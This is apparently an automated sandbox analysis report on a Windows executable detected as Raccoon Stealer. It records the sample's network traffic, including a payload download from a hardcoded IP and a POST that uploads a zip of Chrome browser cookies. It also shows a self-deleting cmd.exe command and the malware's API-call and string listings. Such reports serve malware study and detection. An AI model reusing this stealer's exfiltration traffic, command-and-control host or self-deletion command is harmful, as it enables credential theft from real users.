Sep 28, 2021 07:14:05.683775902 CEST	1046	IN	Data Raw: 80 f9 5b b1 5d 0f 44 d1 b9 01 00 00 00 89 e5 57 56 53 be 01 00 00 00 8a 1c 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 57 56 89 c6 53 31 db 0f b6 0c 1e 0f b6 3c 1a 89 Data Ascii: []DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1KtBOG1x4`a`a)t2`
Sep 28, 2021 07:14:07.903348923 CEST	2000	OUT	GET //l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 28, 2021 07:14:08.157036066 CEST	2008	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:14:08 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04 Data Ascii: PKznN<{rinssdbm3.dll\|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw\|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8KgrLH.v6[4I{1g<>M$G&Y-O9\,tWmX Y3S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ3\G5dZhVLZ\|k5XFYlVVWC\|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{\|!OM>>$\.%LzFl3\|0#N+85NU4+bfS2:cz1C@AZ&woR@
Sep 28, 2021 07:14:10.130856991 CEST	4946	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 1418 Host: 185.138.164.150
Sep 28, 2021 07:14:10.130937099 CEST	4948	OUT	Data Raw: e8 8a c3 02 22 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 Data Ascii: "--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="p5H3KXwB3dP17SpzXqG4"; filename="p5H3KXwB3dP17SpzXqG4.zip"Content-Type: application/octet-streamPK9<SH_*browsers/cookies/Google Chrome
Sep 28, 2021 07:14:10.413902998 CEST	4948	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Sep 2021 05:14:10 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 38 0d 0a 31 63 37 30 33 37 38 32 38 65 38 39 34 34 35 32 63 65 33 64 61 63 63 31 32 34 36 37 61 65 35 34 39 65 30 34 38 31 34 34 0d 0a 30 0d 0a 0d 0a Data Ascii: 281c7037828e894452ce3dacc12467ae549e0481440

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49750	149.154.167.99	443	C:\Users\user\Desktop\8aAG42oIjb.exe

Timestamp	Direction	Data
2021-09-28 05:14:04 UTC	OUT	GET /agrybirdsgamerept HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: t.me
2021-09-28 05:14:04 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:14:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4596 Connection: close Set-Cookie: stel_ssid=43736dd67e8ee65cac_5900796429405690233; expires=Wed, 29 Sep 2021 05:14:04 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2021-09-28 05:14:04 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 8aAG42oIjb.exe PID: 3124 Parent PID: 6416

General

Start time:	07:14:00
Start date:	28/09/2021
Path:	C:\Users\user\Desktop\8aAG42oIjb.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\8aAG42oIjb.exe'
Imagebase:	0x400000
File size:	474112 bytes
MD5 hash:	613617E5B41E1031A2D72E07AFCA8C29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.659119952.0000000002220000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.674067230.0000000002150000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3144 Parent PID: 3124

General

Start time:	07:14:10
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\8aAG42oIjb.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6624 Parent PID: 3144

General

Start time:	07:14:10
Start date:	28/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 6268 Parent PID: 3144

General

Start time:	07:14:11
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0xf0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 8aAG42oIjb.exe PID: 3124 Parent PID: 6416 8aAG42oIjb.exeCOMMON

Executed Functions

Function 0042C383, Relevance: 144.8, APIs: 34, Strings: 45, Instructions: 6501threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C388
CoInitialize.OLE32(00000000), ref: 0042C3A4

Part of subcall function 004360E7: OpenMutexA.KERNEL32 ref: 00436130
Part of subcall function 004360E7: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00432A17

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042C3E8
GetLocaleInfoA.KERNEL32(00000000), ref: 0042C3EF

Part of subcall function 00438EA2: __EH_prolog.LIBCMT ref: 00438EA7
Part of subcall function 00438EA2: CreateToolhelp32Snapshot.KERNEL32 ref: 00438F09
Part of subcall function 00438EA2: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
Part of subcall function 00438EA2: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
Part of subcall function 00438EA2: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
Part of subcall function 00438EA2: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
Part of subcall function 00438EA2: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
Part of subcall function 00438EA2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4

Part of subcall function 00414F98: __EH_prolog.LIBCMT ref: 00414F9D

Sleep.KERNEL32(00001388,00489110,00000000,0047935B), ref: 0042C988

Part of subcall function 004358BF: __EH_prolog.LIBCMT ref: 004358C4

GetUserNameA.ADVAPI32(?,00000101), ref: 0042CB6C

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Sleep.KERNEL32(00007530), ref: 0042CD2A

Part of subcall function 00423759: __EH_prolog.LIBCMT ref: 0042375E

_strlen.LIBCMT ref: 0042CE4B
_strlen.LIBCMT ref: 0042CE65
CreateThread.KERNEL32(00000000,00000000,Function_00016E5D,00000000,00000000,00000000), ref: 0042D0AF
CreateThread.KERNEL32(00000000,00000000,Function_0001BB90,00000000,00000000,00000000), ref: 0042D0C1
StrToIntA.SHLWAPI(00000000,00000000,00489798), ref: 0042D203

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004344AA: __EH_prolog.LIBCMT ref: 004344AF
Part of subcall function 004344AA: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
Part of subcall function 004344AA: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CreateThread.KERNEL32(00000000,00000000,Function_0002A869,00000000,00000000,00000000), ref: 0042D524
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042D52D
CreateThread.KERNEL32(00000000,00000000,Function_0001BA1B,00000000,00000000,00000000), ref: 0042D0D3

Part of subcall function 00432C77: __EH_prolog.LIBCMT ref: 00432C7C

Part of subcall function 004296D2: __EH_prolog.LIBCMT ref: 004296D7

Part of subcall function 00438CD8: __EH_prolog.LIBCMT ref: 00438CDD

Strings

C, xrefs: 00430075
<, xrefs: 00430ED7
(, xrefs: 0042DA2D
/, xrefs: 0042FB5E
POST, xrefs: 0042CCCF
&, xrefs: 0043267F
V, xrefs: 004301B5
5, xrefs: 00432073
h, xrefs: 0042EB3F
~, xrefs: 004323B2
p, xrefs: 0042EC49
:, xrefs: 0042F9CD
O, xrefs: 0043283E
Q, xrefs: 00430A01
C, xrefs: 0042D807
4, xrefs: 0042DC7E
GET, xrefs: 0042C910, 0042C9A5
{, xrefs: 0042DF58
G, xrefs: 00431A40
, xrefs: 00432336
W, xrefs: 004321D2
[, xrefs: 0042D71E
b, xrefs: 00432269
r, xrefs: 00431B48
qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O , xrefs: 0042C6B7
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 0042C6DA
\, xrefs: 0042E886
_id, xrefs: 004319DB
N, xrefs: 0042FCEE
=, xrefs: 0042E9ED
v, xrefs: 004304EB
<, xrefs: 0042D902
0, xrefs: 0042DB43
f, xrefs: 0042F829
s, xrefs: 0042E432
7, xrefs: 0042F365
H, xrefs: 0042EEF7
s, xrefs: 0043245F
9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== , xrefs: 0042C6C7
Q, xrefs: 00432565
_, xrefs: 004306E4
}, xrefs: 0042F1CF
2, xrefs: 0042E71B
S, xrefs: 00431FEE
,, xrefs: 0042ED26

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
String ID: $&$($,$/$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $4$5$7$9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== $:$<$<$=$C$C$G$GET$H$N$O$POST$Q$Q$S$V$W$[$\$_$_id$b$f$h$p$qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O $r$s$s$v${$}$~
API String ID: 376243089-3970548752
Opcode ID: 14bbf4cc5b68d339bf4a5738a914c7f592d17942383a6047084a8920dc831b78
Instruction ID: 4fe60910e1ec4b79d226cabb142ab88437985495ab14f2297e82cd6290d5d1cb
Opcode Fuzzy Hash: 14bbf4cc5b68d339bf4a5738a914c7f592d17942383a6047084a8920dc831b78
Instruction Fuzzy Hash: DED39F34D052A89ADF25E765DC51BEDBBB46F25308F0004DEA54973293DE782B88CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00437819, Relevance: 104.4, APIs: 13, Strings: 46, Instructions: 1169COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043781E

Part of subcall function 004373C6: __EH_prolog.LIBCMT ref: 004373CB
Part of subcall function 004373C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
Part of subcall function 004373C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
Part of subcall function 004373C6: RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

_strftime.LIBCMT ref: 0043794F
GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 00437978
GetLocaleInfoA.KERNEL32(00000000), ref: 0043797F
GetUserNameA.ADVAPI32(?,?), ref: 00437BD0
GetComputerNameA.KERNEL32 ref: 00438275
GetUserNameA.ADVAPI32(00000001,00000101), ref: 004382EF
GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 0043861D
GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00438707
GetSystemMetrics.USER32 ref: 0043888C

Part of subcall function 00439503: __EH_prolog.LIBCMT ref: 00439508

Part of subcall function 00413B98: __EH_prolog.LIBCMT ref: 00413B9D

GetSystemMetrics.USER32 ref: 004388B4
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438950
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004389AC

Strings

2'6i, xrefs: 00437A53
5/, xrefs: 004384C0
qt, xrefs: 00437915
0000, xrefs: 00437D2C
Z, xrefs: 004388E8
/L_Z, xrefs: 004384B7
t5q|, xrefs: 0043790B
isut, xrefs: 0043831C
USED, xrefs: 004387C8
am, xrefs: 00438178
g}, xrefs: 00437AF1
JSRO, xrefs: 0043883F
00, xrefs: 00437D38
@, xrefs: 004386FC
XLJH, xrefs: 00437F33
m{, xrefs: 00437B7F
)!, xrefs: 00438653
)vl, xrefs: 00438220
/Ifc, xrefs: 00437E62
1+, xrefs: 00437DA8
j|5/, xrefs: 00437E6E
rRR_R 3?HR, xrefs: 004386DA
KKFK";QK, xrefs: 00438050
2p]F, xrefs: 00437B76
Qt, xrefs: 004378EE
9}<), xrefs: 00437AE5
:, xrefs: 00438330
`bnx, xrefs: 00437D9E
V\, xrefs: 004388DF
tcu/, xrefs: 00438678
(EJ( , xrefs: 0043877A
v, xrefs: 00437B85
s, xrefs: 00437A5D
0000, xrefs: 00437D22
FPFY, xrefs: 004379D9
3>58, xrefs: 00437ADB
Wed Sep 8 00:01:38 2021, xrefs: 00437A2B
+Hdd, xrefs: 00437D92
x, xrefs: 00437B42
aaaaaaaaaaaaa, xrefs: 004389F7
!;, xrefs: 00438407
., xrefs: 004381ED
:TN, xrefs: 00438326
x, xrefs: 00437FA6
F"#5-2)6, xrefs: 00437CE7
4L, xrefs: 00438456

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
String ID: )!$ :TN$!;$(EJ( $)vl$+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
API String ID: 3358139242-950190238
Opcode ID: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
Instruction ID: dd1f520b829340a486540dcb48aec28350ce5d403088cebc98d7579fb37bcb2b
Opcode Fuzzy Hash: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
Instruction Fuzzy Hash: A3B2D0309083988ACF25DB7588957EDBB71AF1A304F0045EED4897B242EB781F89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043628C, Relevance: 90.3, APIs: 37, Strings: 14, Instructions: 1081registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436291

Part of subcall function 0043922A: __EH_prolog.LIBCMT ref: 0043922F

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040), ref: 0043638B
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436398
RegEnumKeyExW.KERNEL32 ref: 004363D1
wsprintfW.USER32 ref: 004363F9
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436418
RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436494
RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,00000001,?,?,?,?,?,0048A6F8), ref: 00436639
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043671A
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436739
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043673E
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436743
RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043675A
RegEnumKeyExW.KERNEL32 ref: 00436788
wsprintfW.USER32 ref: 004367B0
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 004367CF
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043684B
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,00000001,?,00000001,?,?,?,?,?,0048A6F8), ref: 004369DF
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AC0
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436ADF
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE4
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE9
RegOpenKeyExW.KERNEL32(80000003,0047D410,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B03
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B13
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00436B3D
RegEnumKeyExW.KERNEL32 ref: 00436B85
wsprintfW.USER32 ref: 00436BB0
RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436BCF
RegEnumKeyExW.KERNEL32 ref: 00436C0B
wsprintfW.USER32 ref: 00436C3B
RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012), ref: 00436C5A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012,00000040,00000001), ref: 00436C67
RegQueryValueExA.ADVAPI32(?,tcu/,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,00438A36,00000000), ref: 00436CE4
